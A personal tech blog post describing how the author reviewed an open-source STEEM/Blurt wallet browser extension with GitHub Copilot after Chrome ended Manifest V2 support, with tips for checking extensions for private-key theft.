I found that AI can be very useful for auditing code security. For example, I had been using a wallet extension that supports STEEM and Blurt, but it suddenly stopped working. Normally, I clone the source code from GitHub and load the extension locally using the “Load Unpacked Extension” option in Chrome. This method is safer because it avoids the risk of malicious code being introduced during automatic Chrome extension updates — such as secretly uploading users’ private keys.
The reason the extension stopped working this time is that Chrome no longer supports extensions built with Manifest V2. Although there was a short grace period during which V2 extensions could still be manually loaded, that was likely transitional, and support is now completely gone. So I downloaded the source code for the Whault wallet (which supports multiple chains including STEEM and Blurt) from GitHub, opened it in VS Code, and began reviewing the code. I also asked GitHub Copilot to help me check for suspicious logic — particularly any code that might upload private keys to the cloud. Fortunately, nothing suspicious was found, and the code appears to be safe and trustworthy.
Using AI to assist in reviewing the security of extensions or open-source projects is indeed a very practical and effective approach.
Using AI to Audit the Security of Browser Extension Code
In recent years, there have been numerous cases of browser extensions being compromised by malicious code. This is especially concerning in applications involving crypto wallets, where the leakage of a user’s private key could lead to irreversible losses. To mitigate this risk, I’ve always opted to manually review and locally load third-party wallet extensions to ensure the code is trustworthy.
Why the Extension Stopped Working
I had been using a browser wallet extension (Whale Vault) that supports both STEEM and Blurt. To ensure safety, I would clone the source code from GitHub and load the extension locally using Chrome’s “Load Unpacked Extension” feature. This way, I avoid the risk of automatic updates injecting malicious code, such as silently uploading private keys.
However, the extension recently stopped working. Upon investigation, I found that Chrome has officially dropped support for extensions based on Manifest V2. Although it was still possible to load V2 extensions manually for a while, it was clearly just a transition period, and now that option is completely gone.
Auditing Open Source Plugin Code with Copilot
In response, I looked for a new alternative and came across the Whault wallet, which supports multiple chains including STEEM and Blurt. Since it is also open source, I downloaded the code and opened it in VS Code for manual review.
To improve the efficiency of the review, I used GitHub Copilot to assist in the security audit. I focused on checking for:
- Any logic that uploads private keys to a remote server;
- Suspicious usage of remote scripts;
- Any form of data collection without user consent.
Fortunately, Copilot didn’t flag any malicious patterns, and I didn’t find anything suspicious in the code either. It appears to be a trustworthy project.
AI + Security Review Is a Great Combination
This experience has further convinced me of the great potential of AI in the security domain. When it comes to browser extensions and crypto wallets — applications that involve sensitive user data — manually reviewing code line by line can be time-consuming and error-prone. AI assistants, on the other hand, can quickly highlight potential risk points, significantly improving the efficiency and accuracy of code audits.
Final Thoughts
As the browser extension ecosystem continues to evolve, we can’t always rely on official marketplaces to ensure plugin security. For extensions involving sensitive permissions, I recommend that developers and advanced users:
- Prefer open-source plugins and download them directly from official repositories;
- Use local loading instead of installing from extension stores;
- Utilize AI tools like GitHub Copilot or CodeQL for static code analysis;
- Use debugging tools or network sniffers if necessary to verify runtime behavior.
Using AI to audit code is not just an efficiency boost — it’s also a reflection of strong security awareness.
Audit Blockchain Wallet Extension Code using Github Copilot AI
Artificial Intelligence
- Alpha Arena: How AI Performs in the Real Crypto Market
- Auditing Blockchain Wallet Code with Copilot AI
- What is Moravec's Paradox?
–EOF (The Ultimate Computing & Technology Blog) —
Last Post: Understanding the LEA Instruction: A Powerful Tool for Address Calculation in x86 Assembly
Next Post: Python match vs Traditional if-elif: A Modern Take on Switch Statements